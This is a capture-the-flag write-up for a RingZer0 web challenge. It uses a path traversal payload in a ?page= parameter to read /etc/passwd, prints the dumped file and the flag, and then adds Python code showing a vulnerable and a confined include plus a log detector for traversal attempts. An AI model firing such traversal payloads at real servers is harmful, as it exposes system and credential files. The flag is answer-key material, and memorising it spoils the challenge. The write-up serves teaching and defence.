RingZer0-18 - Looking for Password File
Web
Password file
The hint tells us to look for a password file.
The url is http://ringzer0team.com:1008/?page=lorem.php
The ?page= parameter is a giveaway that the page could be vulnerable to path traversal: the value looks like a file name that the server includes directly.
On a Linux system the password file is located at /etc/passwd.
So let's try to reach the file by stepping up out of the web root:
http://ringzer0team.com:1008/?page=../../../etc/passwd
Results
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:FLAG-zH9g1934v774Y7Zx5s16t5ym8Z:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
syslog:x:102:105::/home/syslog:/bin/false
And there's the flag, sitting in the GECOS (comment) field of the nobody entry!
The flag is: FLAG-zH9g1934v774Y7Zx5s16t5ym8Z
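As an added note to this writeup (example code, not from the challenge or the original post): the same ?page= include done the unchecked way beside a confined, allow-listed version, plus a small check that flags traversal attempts in access-log lines. The pages directory, the allow-list and the log lines are constructed for the example.

```python
"""Confining a ?page= include to one directory, and spotting traversal in web logs."""
import os
import re
from typing import List, Optional
from urllib.parse import unquote

# Assumed layout for the example: page templates live under this directory.
PAGES_DIR = "/var/www/pages"
ALLOWED_PAGES = {"lorem.php", "index.php", "about.php"}


def vulnerable_resolve(page: str) -> str:
    """What an unchecked include does: the caller controls the whole path."""
    return os.path.normpath(os.path.join(PAGES_DIR, page))


def safe_resolve(page: str) -> Optional[str]:
    """Accept only allow-listed names that also normalise to a file inside PAGES_DIR."""
    if page not in ALLOWED_PAGES:
        return None
    resolved = os.path.normpath(os.path.join(PAGES_DIR, page))
    # Even an allow-listed name must stay under the base directory.
    if os.path.commonpath([PAGES_DIR, resolved]) != PAGES_DIR:
        return None
    return resolved


# Traversal markers checked after one round of URL-decoding, so "..%2F" and a
# doubly-encoded "%252e%252e%252f" are both caught.
_TRAVERSAL = re.compile(r"(\.\./|\.\.\\|%2e%2e%2f|%2e%2e/|\.\.%2f)", re.IGNORECASE)


def find_traversal_attempts(log_lines: List[str]) -> List[str]:
    """Return the log lines whose request target contains a traversal sequence."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if m and _TRAVERSAL.search(unquote(m.group(1))):
            hits.append(line)
    return hits


# Constructed sample access-log lines (Apache combined format, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:12:00:00 +0000] "GET /?page=lorem.php HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:12:00:01 +0000] "GET /?page=../../../etc/passwd HTTP/1.1" 200 2048',
    '203.0.113.5 - - [01/Jan/2024:12:00:02 +0000] "GET /?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048',
]
```

vulnerable_resolve("../../../etc/passwd") normalises to /etc/passwd, which is exactly why the challenge works; safe_resolve rejects it, and find_traversal_attempts flags both the plain and the URL-encoded request.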